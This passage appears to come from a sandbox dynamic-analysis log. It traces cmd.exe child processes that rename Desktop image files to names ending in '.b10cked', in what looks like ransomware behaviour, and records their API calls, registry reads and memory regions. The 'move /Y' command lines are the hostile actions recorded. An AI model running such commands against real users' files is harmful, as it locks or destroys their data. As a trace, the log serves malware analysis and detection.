returned -17 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0220.856] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0220.856] _wcsicmp (_String1="9CDGYB~1.BMP", _String2=".") returned 11 [0220.856] _wcsicmp (_String1="9CDGYB~1.BMP", _String2="..") returned 11 [0220.856] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\9CDGYB~1.BMP" (normalized: "c:\\users\\eebsym5\\desktop\\9cdgyb~1.bmp")) returned 0x20 [0220.856] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x351e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.856] SetErrorMode (uMode=0x0) returned 0x0 [0220.856] SetErrorMode (uMode=0x1) returned 0x0 [0220.856] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\9CDGYB~1.BMP", nBufferLength=0x104, lpBuffer=0x24f0bc, lpFilePart=0x24f0a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\9CDGYB~1.BMP", lpFilePart=0x24f0a4*="9CDGYB~1.BMP") returned 0x25 [0220.856] SetErrorMode (uMode=0x0) returned 0x1 [0220.857] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.857] _wcsicmp (_String1="9CDGYB~1.BMP", _String2=".") returned 11 [0220.857] _wcsicmp (_String1="9CDGYB~1.BMP", _String2="..") returned 11 [0220.857] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\9CDGYB~1.BMP" (normalized: "c:\\users\\eebsym5\\desktop\\9cdgyb~1.bmp")) returned 0x20 [0220.857] SetErrorMode (uMode=0x0) returned 0x0 [0220.857] SetErrorMode (uMode=0x1) returned 0x0 [0220.857] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\9CDGYB~1.BMP", nBufferLength=0x104, lpBuffer=0x24f538, lpFilePart=0x24f2d0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\9CDGYB~1.BMP", lpFilePart=0x24f2d0*="9CDGYB~1.BMP") returned 0x25 [0220.857] SetErrorMode (uMode=0x0) returned 0x1 [0220.857] SetErrorMode (uMode=0x0) returned 0x0 [0220.857] SetErrorMode (uMode=0x1) returned 0x0 [0220.857] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x24f740, lpFilePart=0x24f2d0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp.b10cked", lpFilePart=0x24f2d0*="9CDgy bLN0e-uZnqSYBc.bmp.b10cked") returned 0x39 [0220.857] SetErrorMode (uMode=0x0) returned 0x1 [0220.857] SetLastError (dwErrCode=0x0) [0220.857] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\9cdgy bln0e-uznqsybc.bmp.b10cked")) returned 0xffffffff [0220.857] GetLastError () returned 0x2 [0220.857] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\9CDGYB~1.BMP", fInfoLevelId=0x1, lpFindFileData=0x24ec4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec4c) returned 0x340e68 [0220.858] FindNextFileW (in: hFindFile=0x340e68, lpFindFileData=0x24ec4c | out: lpFindFileData=0x24ec4c) returned 0 [0222.979] GetLastError () returned 0x12 [0222.979] FindClose (in: hFindFile=0x340e68 | out: hFindFile=0x340e68) returned 1 [0222.980] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\9CDGYB~1.BMP", fInfoLevelId=0x1, lpFindFileData=0x351bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x351bd8) returned 0x340e68 [0222.980] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x24eee4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp.b10cked", lpFilePart=0x0) returned 0x39 [0222.980] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp", nBufferLength=0x104, lpBuffer=0x24eee4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp", lpFilePart=0x0) returned 0x31 [0222.980] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\9cdgy bln0e-uznqsybc.bmp")) returned 0x20 [0222.980] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\9cdgy bln0e-uznqsybc.bmp"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\9cdgy bln0e-uznqsybc.bmp.b10cked"), dwFlags=0x3) returned 1 [0222.981] FindClose (in: hFindFile=0x340e68 | out: hFindFile=0x340e68) returned 1 [0222.981] _vsnwprintf (in: _Buffer=0x4a1e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x24ee98 | out: _Buffer=" 1") returned 9 [0222.981] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.981] GetFileType (hFile=0x7) returned 0x2 [0222.981] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0222.981] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24ee24 | out: lpMode=0x24ee24) returned 1 [0222.981] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.981] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x24ee58 | out: lpConsoleScreenBufferInfo=0x24ee58) returned 1 [0222.982] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0222.982] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x24ee98 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0222.982] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a1f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x24ee7c, lpReserved=0x0 | out: lpBuffer=0x4a1f4640*, lpNumberOfCharsWritten=0x24ee7c*=0x1a) returned 1 [0222.982] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.982] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0222.983] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.983] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0222.983] _get_osfhandle (_FileHandle=0) returned 0x3 [0222.983] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0222.983] SetConsoleInputExeNameW () returned 0x1 [0222.983] GetConsoleOutputCP () returned 0x1b5 [0222.983] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0222.983] SetThreadUILanguage (LangId=0x0) returned 0x409 [0222.983] exit (_Code=0) Process: id = "573" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea169e0" os_pid = "0x918" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\95ICX9~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32884 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32885 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32886 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32887 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 32888 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32889 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32890 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32891 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32892 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 32893 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33176 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33177 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33178 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33179 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 33180 start_va = 0x580000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 33181 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33182 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33183 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33184 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33185 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33186 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33187 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33188 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33189 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33190 start_va = 0x1e0000 end_va = 0x2a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 33191 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33192 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33193 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 33194 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 33195 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 33196 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 33197 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 33198 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 33199 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 776 os_tid = 0xcd8 [0220.752] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fbbc | out: lpSystemTimeAsFileTime=0x16fbbc*(dwLowDateTime=0xb861e0e0, dwHighDateTime=0x1d440a9)) [0220.752] GetCurrentProcessId () returned 0x918 [0220.752] GetCurrentThreadId () returned 0xcd8 [0220.752] GetTickCount () returned 0x3d99c [0220.752] QueryPerformanceCounter (in: lpPerformanceCount=0x16fbb4 | out: lpPerformanceCount=0x16fbb4*=27754171029) returned 1 [0220.753] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0220.753] __set_app_type (_Type=0x1) [0220.753] __p__fmode () returned 0x76b331f4 [0220.753] __p__commode () returned 0x76b331fc [0220.753] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0220.753] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 0 [0220.753] GetCurrentThreadId () returned 0xcd8 [0220.753] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcd8) returned 0x38 [0220.753] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.754] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0220.754] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.754] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0220.754] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fb4c | out: phkResult=0x16fb4c*=0x0) returned 0x2 [0220.754] VirtualQuery (in: lpAddress=0x16fb83, lpBuffer=0x16fb1c, dwLength=0x1c | out: lpBuffer=0x16fb1c*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.754] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fb1c, dwLength=0x1c | out: lpBuffer=0x16fb1c*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0220.754] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fb1c, dwLength=0x1c | out: lpBuffer=0x16fb1c*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0220.754] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fb1c, dwLength=0x1c | out: lpBuffer=0x16fb1c*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.754] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fb1c, dwLength=0x1c | out: lpBuffer=0x16fb1c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0220.754] GetConsoleOutputCP () returned 0x1b5 [0220.754] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.754] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0220.754] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.754] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0220.754] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.754] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.755] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.755] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.755] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.755] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.755] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.755] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0220.755] GetEnvironmentStringsW () returned 0x300160* [0220.755] FreeEnvironmentStringsW (penv=0x300160) returned 1 [0220.755] GetEnvironmentStringsW () returned 0x300160* [0220.755] FreeEnvironmentStringsW (penv=0x300160) returned 1 [0220.755] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eabc | out: phkResult=0x16eabc*=0x40) returned 0x0 [0220.755] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eac4, lpData=0x16eac8, lpcbData=0x16eac0*=0x1000 | out: lpType=0x16eac4*=0x0, lpData=0x16eac8*=0x88, lpcbData=0x16eac0*=0x1000) returned 0x2 [0220.755] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eac4, lpData=0x16eac8, lpcbData=0x16eac0*=0x1000 | out: lpType=0x16eac4*=0x4, lpData=0x16eac8*=0x1, lpcbData=0x16eac0*=0x4) returned 0x0 [0220.756] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eac4, lpData=0x16eac8, lpcbData=0x16eac0*=0x1000 | out: lpType=0x16eac4*=0x0, lpData=0x16eac8*=0x1, lpcbData=0x16eac0*=0x1000) returned 0x2 [0220.756] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eac4, lpData=0x16eac8, lpcbData=0x16eac0*=0x1000 | out: lpType=0x16eac4*=0x4, lpData=0x16eac8*=0x0, lpcbData=0x16eac0*=0x4) returned 0x0 [0220.756] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eac4, lpData=0x16eac8, lpcbData=0x16eac0*=0x1000 | out: lpType=0x16eac4*=0x4, lpData=0x16eac8*=0x40, lpcbData=0x16eac0*=0x4) returned 0x0 [0220.756] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eac4, lpData=0x16eac8, lpcbData=0x16eac0*=0x1000 | out: lpType=0x16eac4*=0x4, lpData=0x16eac8*=0x40, lpcbData=0x16eac0*=0x4) returned 0x0 [0220.756] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eac4, lpData=0x16eac8, lpcbData=0x16eac0*=0x1000 | out: lpType=0x16eac4*=0x0, lpData=0x16eac8*=0x40, lpcbData=0x16eac0*=0x1000) returned 0x2 [0220.756] RegCloseKey (hKey=0x40) returned 0x0 [0220.756] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eabc | out: phkResult=0x16eabc*=0x40) returned 0x0 [0220.756] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eac4, lpData=0x16eac8, lpcbData=0x16eac0*=0x1000 | out: lpType=0x16eac4*=0x0, lpData=0x16eac8*=0x40, lpcbData=0x16eac0*=0x1000) returned 0x2 [0220.756] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eac4, lpData=0x16eac8, lpcbData=0x16eac0*=0x1000 | out: lpType=0x16eac4*=0x4, lpData=0x16eac8*=0x1, lpcbData=0x16eac0*=0x4) returned 0x0 [0220.756] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eac4, lpData=0x16eac8, lpcbData=0x16eac0*=0x1000 | out: lpType=0x16eac4*=0x0, lpData=0x16eac8*=0x1, lpcbData=0x16eac0*=0x1000) returned 0x2 [0220.756] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eac4, lpData=0x16eac8, lpcbData=0x16eac0*=0x1000 | out: lpType=0x16eac4*=0x4, lpData=0x16eac8*=0x0, lpcbData=0x16eac0*=0x4) returned 0x0 [0220.756] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eac4, lpData=0x16eac8, lpcbData=0x16eac0*=0x1000 | out: lpType=0x16eac4*=0x4, lpData=0x16eac8*=0x9, lpcbData=0x16eac0*=0x4) returned 0x0 [0220.756] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eac4, lpData=0x16eac8, lpcbData=0x16eac0*=0x1000 | out: lpType=0x16eac4*=0x4, lpData=0x16eac8*=0x9, lpcbData=0x16eac0*=0x4) returned 0x0 [0220.756] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eac4, lpData=0x16eac8, lpcbData=0x16eac0*=0x1000 | out: lpType=0x16eac4*=0x0, lpData=0x16eac8*=0x9, lpcbData=0x16eac0*=0x1000) returned 0x2 [0220.756] RegCloseKey (hKey=0x40) returned 0x0 [0220.756] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b6 [0220.756] srand (_Seed=0x5b8863b6) [0220.756] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\95ICX9~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp.b10cked\"" [0220.756] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\95ICX9~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp.b10cked\"" [0220.756] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.756] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3018c0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0220.757] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0220.757] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.757] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.757] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0220.757] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0220.757] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0220.757] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0220.757] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0220.757] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0220.757] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0220.757] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0220.757] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0220.757] GetEnvironmentStringsW () returned 0x3022b0* [0220.757] FreeEnvironmentStringsW (penv=0x3022b0) returned 1 [0220.757] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.757] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.757] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0220.757] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0220.757] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0220.757] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0220.757] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0220.757] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0220.757] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0220.757] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0220.757] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f888 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.757] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f888, lpFilePart=0x16f884 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f884*="Desktop") returned 0x18 [0220.758] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.758] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f604 | out: lpFindFileData=0x16f604) returned 0x2ffff0 [0220.758] FindClose (in: hFindFile=0x2ffff0 | out: hFindFile=0x2ffff0) returned 1 [0220.758] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f604 | out: lpFindFileData=0x16f604) returned 0x2ffff0 [0220.758] FindClose (in: hFindFile=0x2ffff0 | out: hFindFile=0x2ffff0) returned 1 [0220.758] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", 